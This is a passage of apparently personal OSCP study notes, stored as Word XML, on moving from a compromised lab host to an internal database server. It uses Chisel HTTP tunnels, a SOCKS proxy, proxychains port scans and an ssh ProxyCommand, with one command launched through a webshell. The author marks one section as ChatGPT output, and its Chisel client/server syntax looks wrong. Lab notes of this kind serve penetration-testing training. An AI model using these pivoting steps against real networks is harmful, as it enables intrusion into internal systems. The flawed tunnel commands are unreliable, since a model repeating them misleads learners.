        </w:rPr>
        <w:t xml:space="preserve">3. SSH into the target machine (PGDATABASE01) from Kali</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t xml:space="preserve">Once the tunnel is up:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh database_admin@127.0.0.1 -p 2222</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t xml:space="preserve">You are now connected to PGDATABASE01 (visa SSH) through the Chisel local port forward!</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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9p5psgtqd0m8" w:id="92"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Dynamic Port forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT so use it with a grain of salt. I would recommend you look at this simple guide below instead, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId230">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Attacker IP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192.168.118.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised machine (CONFLUENCE01)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192.168.50.63</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal target (PGDATABASE01)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10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can reach PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">have a shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no outbound firewall restrictions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CONFLUENCE01 can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept inbound connections on TCP/8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kali.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Chisel to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">create a SOCKS proxy on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which Kali can connect to over HTTP. You’ll then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route traffic through that SOCKS proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the internal network (e.g., SSH, SMB, RDP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the Chisel equivalent of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH dynamic port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -D 1080 user@pivot</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step: Chisel Dynamic Port Forwarding</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Start the Chisel client on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets up a SOCKS proxy on CONFLUENCE01, and listens for the Chisel server to connect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client --socks 127.0.0.1:1080 --listen 0.0.0.0:8080</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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--socks 127.0.0.1:1080:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a SOCKS5 proxy on the pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--listen 0.0.0.0:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Listen on port 8080 for incoming Chisel server connections from Kali</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(If 127.0.0.1:1080 doesn't work for local access, you can also try 0.0.0.0:1080 to bind the proxy to all interfaces.)</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t xml:space="preserve">If you’re injecting this command via a webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client --socks 127.0.0.1:1080 --listen 0.0.0.0:8080 &gt; /dev/null 2&gt;&amp;1 &amp;</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Start the Chisel server on Kali and connect to CONFLUENCE01</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From Kali, connect to the Chisel client’s listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --connect 192.168.50.63:8080</w:t>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t xml:space="preserve">This initiates the HTTP tunnel to CONFLUENCE01 and lets you start using the SOCKS proxy running on the target.</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If you get a handshake or fingerprint mismatch error, you can add --no-auth on both sides to disable fingerprint auth (only for lab use).</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Use SOCKS proxy on CONFLUENCE01 from Kali via SSH ProxyCommand or proxychains</w:t>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t xml:space="preserve">You now have to point Kali tools to the SOCKS proxy, which lives on CONFLUENCE01.</w:t>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t xml:space="preserve">To do that, you need to create a tunnel from your Kali to that SOCKS proxy. Here’s how:</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Option 1: SSH-style proxy use with ncat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -o ProxyCommand="ncat --proxy-type socks5 --proxy 192.168.50.63:1080 %h %p" database_admin@10.4.50.215</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Option 2: Configure proxychains to use CONFLUENCE01 as proxy</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/proxychains.conf:</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[ProxyList]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 1080</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then run:</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains nmap -Pn -p22,445,3389 10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains smbclient -L 10.4.50.215</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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_as51w6jlo0lp" w:id="93"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical usage of Chisel for reverse port forwarding can be seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId231">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 It was used, but it didn't actually help towards getting flag. Still helpful to see being used in real life</w:t>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t xml:space="preserve">From OSCP (27.4.2. Services and Sessions)</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, this is a continuation of the enumeration from the "</w:t>
      </w:r>
      <w:hyperlink w:anchor="_1driqwbpvfv8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Set up SOCKS5 Proxy to access internal network</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section </w:t>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t xml:space="preserve">While we could use the SOCKS5 proxy and proxychains to browse to the open port on 172.16.6.241, we'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId232">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId233">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it provides a more stable and interactive browser session. From the</w:t>
      </w:r>
      <w:hyperlink r:id="rId234">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId235">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">releases page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we download the Windows and Linux amd64 versions and extract the binaries in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/beyond/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</w:t>
      </w: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t xml:space="preserve">On our Kali machine, we'll use Chisel in server mode to receive incoming connections on port 8080. In addition, we'll add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to allow </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
